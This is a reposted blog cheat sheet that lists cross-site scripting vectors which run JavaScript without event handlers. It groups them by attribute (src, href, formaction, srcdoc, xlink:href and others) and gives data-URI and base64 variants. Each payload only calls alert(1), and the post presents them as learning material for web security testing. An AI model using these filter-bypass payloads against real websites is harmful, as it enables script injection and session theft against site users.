zoukankan      html  css  js  c++  java

  • 【XSS技巧拓展】————24、XSS Without Event Handlers

    There are some XSS attacks that don’t rely on our XSS payload scheme. These ones are based on a local or remote resource call. What we will see is not an exhaustive list and some require UI (user interaction) but they all are meant to work in latest Firefox and Chrome browsers until date except the ones marked with an asterisk (Firefox only).

    Our default javascript payload is “javascript:alert(1)” with few exceptions. It provides some room for obfuscation in case of a filter but it can be replaced by the data URI scheme:

    “data:text/html,<script>alert(1)</script>”
    or
    data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

    Because they are useful as alternatives to the event based ones, let’s group them regarding the attribute needed to trigger the alert:

    1) (no attribute)

    <script>alert(1)</script>

    2) src

    <script src=javascript:alert(1)>
    <iframe src=javascript:alert(1)>
    <embed src=javascript:alert(1)> *

    3) href

    <a href=javascript:alert(1)>click
    <math><brute href=javascript:alert(1)>click *

    4) action

    <form action=javascript:alert(1)><input type=submit>
    <isindex action=javascript:alert(1) type=submit value=click> *

    5) formaction

    <form><button formaction=javascript:alert(1)>click
    <form><input formaction=javascript:alert(1) type=submit value=click>
    <form><input formaction=javascript:alert(1) type=image value=click>
    <form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
    <isindex formaction=javascript:alert(1) type=submit value=click> *

    6) data

    <object data=javascript:alert(1)> *

    7) srcdoc

    <iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>

    8) xlink:href

    <svg><script xlink:href=data:,alert(1)></script>
    <svg><script xlink:href=data:,alert(1) /> *
    <math><brute xlink:href=javascript:alert(1)>click *

    9) from

    <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

        <a href=javascript:alert(1)>, with “javascript” obfuscated and styled as a fake youtube video player.

    If you know any other vector, please let me know in comments and I will update this list.

    #hack2learn

    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    sqlserver调优-索引
    浮点数的这些坑,你未必知道-深入理解浮点数的规律
    生产环境部署springcloud微服务启动慢的问题排查
    redis传输协议规范-下(Redis Protocol specification)
    一步步完成“迷你版” 的ASP.NET Core框架
    安全漏洞整改系列(一)
    docker实战(二)之redis的使用
    docker实战(一)之Tomcat的安装
    docker安装步骤
    WPF后台操作前台元素之查找对象
  • 原文地址:https://www.cnblogs.com/devi1/p/13486391.html
Copyright © 2011-2022 走看看